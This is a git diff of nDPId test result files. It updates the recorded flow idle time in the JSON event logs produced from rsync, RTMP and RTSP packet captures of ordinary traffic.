+00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"rsync.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1387144174826,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1387144174826,"pkt":"AAAAAAAAAAAAAAAACABFAAA0ACFAAEAGPKF\/AAABfwAAAdTZA2mzXXC2URoXF4AQACv+KAAAAQEICgA8cJUAPHCV"} +00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"rsync.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1387144174826,"flow_last_seen":1387144174828,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":14,"flow_tot_l4_payload_len":45,"flow_avg_l4_payload_len":5,"midstream":0,"thread_ts_msec":1387144174828,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":54489,"dst_port":873,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"RSYNC","breed":"Acceptable","category":"DataTransfer"}} +00676{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":30,"source":"rsync.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1387144174826,"flow_last_seen":1387144174967,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":346,"flow_tot_l4_payload_len":497,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1387144174967,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":54489,"dst_port":873,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"RSYNC","breed":"Acceptable","category":"DataTransfer"}} 00549{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":30,"source":"rsync.pcap","alias":"nDPId-test","packets-captured":30,"packets-processed":30,"total-skipped-flows":0,"total-l4-data-len":497,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1387144174967} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 30/30 diff --git a/test/results/rtmp.pcap.out b/test/results/rtmp.pcap.out index c8b1e96f1..20966c547 100644 --- a/test/results/rtmp.pcap.out +++ b/test/results/rtmp.pcap.out @@ -1,11 +1,11 @@ 00455{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"rtmp.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00541{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"rtmp.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1196541506793} -00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"rtmp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1196541506793,"flow_last_seen":1196541506793,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1196541506793,"l3_proto":"ip4","src_ip":"192.168.43.1","dst_ip":"192.168.43.128","src_port":1177,"dst_port":1935,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"rtmp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1196541506793,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1196541506793,"pkt":"AAwpfMZqAFBWwAAICABFAAAwAzJAAIAGH8TAqCsBwKgrgASZB49J0s7PAAAAAHAC\/\/+GgwAAAgQFtAEBBAI="} -00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"rtmp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1196541506794,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1196541506794,"pkt":"AFBWwAAIAAwpfMZqCABFAAAwAABAAEAGYvbAqCuAwKgrAQePBJklcSWUSdLO0HASFtAknQAAAgQFtAEBBAI="} -00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"rtmp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1196541506794,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1196541506794,"pkt":"AAwpfMZqAFBWwAAICABFAAAoAzNAAIAGH8vAqCsBwKgrgASZB49J0s7QJXEllVAQ\/\/9oMQAA"} -00638{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"rtmp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1196541506793,"flow_last_seen":1196541507028,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2797,"flow_avg_l4_payload_len":349,"midstream":0,"thread_ts_msec":1196541507028,"l3_proto":"ip4","src_ip":"192.168.43.1","dst_ip":"192.168.43.128","src_port":1177,"dst_port":1935,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"RTMP","breed":"Acceptable","category":"Media"}} -00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":26,"source":"rtmp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":26,"flow_first_seen":1196541506793,"flow_last_seen":1196541507836,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":6948,"flow_avg_l4_payload_len":267,"midstream":0,"thread_ts_msec":1196541507836,"l3_proto":"ip4","src_ip":"192.168.43.1","dst_ip":"192.168.43.128","src_port":1177,"dst_port":1935,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"RTMP","breed":"Acceptable","category":"Media"}} +00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"rtmp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1196541506793,"flow_last_seen":1196541506793,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1196541506793,"l3_proto":"ip4","src_ip":"192.168.43.1","dst_ip":"192.168.43.128","src_port":1177,"dst_port":1935,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"rtmp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1196541506793,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1196541506793,"pkt":"AAwpfMZqAFBWwAAICABFAAAwAzJAAIAGH8TAqCsBwKgrgASZB49J0s7PAAAAAHAC\/\/+GgwAAAgQFtAEBBAI="} +00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"rtmp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1196541506794,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1196541506794,"pkt":"AFBWwAAIAAwpfMZqCABFAAAwAABAAEAGYvbAqCuAwKgrAQePBJklcSWUSdLO0HASFtAknQAAAgQFtAEBBAI="} +00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"rtmp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1196541506794,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1196541506794,"pkt":"AAwpfMZqAFBWwAAICABFAAAoAzNAAIAGH8vAqCsBwKgrgASZB49J0s7QJXEllVAQ\/\/9oMQAA"} +00638{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"rtmp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1196541506793,"flow_last_seen":1196541507028,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2797,"flow_avg_l4_payload_len":349,"midstream":0,"thread_ts_msec":1196541507028,"l3_proto":"ip4","src_ip":"192.168.43.1","dst_ip":"192.168.43.128","src_port":1177,"dst_port":1935,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"RTMP","breed":"Acceptable","category":"Media"}} +00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":26,"source":"rtmp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":26,"flow_first_seen":1196541506793,"flow_last_seen":1196541507836,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":6948,"flow_avg_l4_payload_len":267,"midstream":0,"thread_ts_msec":1196541507836,"l3_proto":"ip4","src_ip":"192.168.43.1","dst_ip":"192.168.43.128","src_port":1177,"dst_port":1935,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"RTMP","breed":"Acceptable","category":"Media"}} 00549{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":26,"source":"rtmp.pcap","alias":"nDPId-test","packets-captured":26,"packets-processed":26,"total-skipped-flows":0,"total-l4-data-len":6948,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1196541507836} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 26/26 diff --git a/test/results/rtsp.pcap.out b/test/results/rtsp.pcap.out index d416118ec..412768948 100644 --- a/test/results/rtsp.pcap.out +++ b/test/results/rtsp.pcap.out @@ -1,47 +1,47 @@ 00455{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"rtsp.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00541{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"rtsp.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1627567277506} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1627567277506,"flow_last_seen":1627567277506,"flow_idle_time":7440000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1627567277506,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52470,"dst_port":8554,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -00653{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1627567277506,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":205,"pkt_l4_len":169,"thread_ts_msec":1627567277506,"pkt":"AAMAAQAGAAwp8x5yAAAIAEUAAL1W3kAAgAaMTgoBAQoKAgICzPYhajvib4JhB2\/CUBgEAcxeAABHRVRfUEFSQU1FVEVSIHJ0c3A6Ly8xMC4yLjIuMjo4NTU0LyBSVFNQLzEuMA0KQ1NlcTogNw0KVXNlci1BZ2VudDogTGliVkxDLzMuMC4xNiAoTElWRTU1NSBTdHJlYW1pbmcgTWVkaWEgdjIwMTYuMTEuMjgpDQpTZXNzaW9uOiA2NjBmYzRjMGM2YWQ0M2ExDQoNCg=="} -00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1627567277506,"flow_last_seen":1627567277506,"flow_idle_time":7440000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1627567277506,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52470,"dst_port":8554,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"RTSP","breed":"Fun","category":"Media"}} -00653{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1627567277506,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":205,"pkt_l4_len":169,"thread_ts_msec":1627567277506,"pkt":"AAAAAQAGAAwp8x5yAAAIAEUAAL1W3kAAgAaMTgoBAQoKAgICzPYhajvib4JhB2\/CUBgEAcxeAABHRVRfUEFSQU1FVEVSIHJ0c3A6Ly8xMC4yLjIuMjo4NTU0LyBSVFNQLzEuMA0KQ1NlcTogNw0KVXNlci1BZ2VudDogTGliVkxDLzMuMC4xNiAoTElWRTU1NSBTdHJlYW1pbmcgTWVkaWEgdjIwMTYuMTEuMjgpDQpTZXNzaW9uOiA2NjBmYzRjMGM2YWQ0M2ExDQoNCg=="} -00653{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1627567277506,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":205,"pkt_l4_len":169,"thread_ts_msec":1627567277506,"pkt":"AAQAAQAGAAwpOL1kAAAIAEUAAL1W3kAAfwaNTgoBAQoKAgICzPYhajvib4JhB2\/CUBgEAcxeAABHRVRfUEFSQU1FVEVSIHJ0c3A6Ly8xMC4yLjIuMjo4NTU0LyBSVFNQLzEuMA0KQ1NlcTogNw0KVXNlci1BZ2VudDogTGliVkxDLzMuMC4xNiAoTElWRTU1NSBTdHJlYW1pbmcgTWVkaWEgdjIwMTYuMTEuMjgpDQpTZXNzaW9uOiA2NjBmYzRjMGM2YWQ0M2ExDQoNCg=="} -00568{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":13,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1627567279015,"flow_last_seen":1627567279015,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1627567279015,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52472,"dst_port":8554,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1627567279015,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1627567279015,"pkt":"AAMAAQAGAAwp8x5yAAAIAEUAADRW5UAAgAaM0AoBAQoKAgICzPghaqHfszoAAAAAgAL68BmUAAACBAW0AQMDCAEBBAI="} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1627567279015,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1627567279015,"pkt":"AAAAAQAGAAwp8x5yAAAIAEUAADRW5UAAgAaM0AoBAQoKAgICzPghaqHfszoAAAAAgAL68BmUAAACBAW0AQMDCAEBBAI="} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1627567279015,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1627567279015,"pkt":"AAQAAQAGAAwpOL1kAAAIAEUAADRW5UAAfwaN0AoBAQoKAgICzPghaqHfszoAAAAAgAL68BmUAAACBAW0AQMDCAEBBAI="} -00761{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":25,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1627567279015,"flow_last_seen":1627567279029,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":116,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1627567279029,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52472,"dst_port":8554,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"RTSP","breed":"Fun","category":"Media"}} -00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":109,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1627567338841,"flow_last_seen":1627567338841,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1627567338841,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52474,"dst_port":8554,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":109,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1627567338841,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1627567338841,"pkt":"AAMAAQAGAAwp8x5yAAAIAEUAADRXFEAAgAaMoQoBAQoKAgICzPohap\/Ji+cAAAAAgAL68EL7AAACBAW0AQMDCAEBBAI="} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":110,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1627567338841,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1627567338841,"pkt":"AAAAAQAGAAwp8x5yAAAIAEUAADRXFEAAgAaMoQoBAQoKAgICzPohap\/Ji+cAAAAAgAL68EL7AAACBAW0AQMDCAEBBAI="} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":111,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1627567338841,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1627567338841,"pkt":"AAQAAQAGAAwpOL1kAAAIAEUAADRXFEAAfwaNoQoBAQoKAgICzPohap\/Ji+cAAAAAgAL68EL7AAACBAW0AQMDCAEBBAI="} -00762{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":121,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1627567338841,"flow_last_seen":1627567338851,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":116,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1627567338851,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52474,"dst_port":8554,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"RTSP","breed":"Fun","category":"Media"}} -00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":193,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1627567398644,"flow_last_seen":1627567398644,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1627567398644,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52476,"dst_port":8554,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":193,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1627567398644,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1627567398644,"pkt":"AAMAAQAGAAwp8x5yAAAIAEUAADRXQ0AAgAaMcgoBAQoKAgICzPwhaprxAXoAAAAAgAL68NI+AAACBAW0AQMDCAEBBAI="} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":194,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1627567398644,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1627567398644,"pkt":"AAAAAQAGAAwp8x5yAAAIAEUAADRXQ0AAgAaMcgoBAQoKAgICzPwhaprxAXoAAAAAgAL68NI+AAACBAW0AQMDCAEBBAI="} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":195,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1627567398644,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1627567398644,"pkt":"AAQAAQAGAAwpOL1kAAAIAEUAADRXQ0AAfwaNcgoBAQoKAgICzPwhaprxAXoAAAAAgAL68NI+AAACBAW0AQMDCAEBBAI="} -00762{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":205,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1627567398644,"flow_last_seen":1627567398650,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":116,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1627567398650,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52476,"dst_port":8554,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"RTSP","breed":"Fun","category":"Media"}} -00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":289,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1627567406342,"flow_last_seen":1627567406342,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1627567406342,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52478,"dst_port":8554,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":289,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1627567406342,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1627567406342,"pkt":"AAMAAQAGAAwp8x5yAAAIAEUAADRXW0AAgAaMWgoBAQoKAgICzP4hahoxf3IAAAAAgAL68NUEAAACBAW0AQMDCAEBBAI="} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":290,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1627567406342,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1627567406342,"pkt":"AAAAAQAGAAwp8x5yAAAIAEUAADRXW0AAgAaMWgoBAQoKAgICzP4hahoxf3IAAAAAgAL68NUEAAACBAW0AQMDCAEBBAI="} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":291,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1627567406342,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1627567406342,"pkt":"AAQAAQAGAAwpOL1kAAAIAEUAADRXW0AAfwaNWgoBAQoKAgICzP4hahoxf3IAAAAAgAL68NUEAAACBAW0AQMDCAEBBAI="} 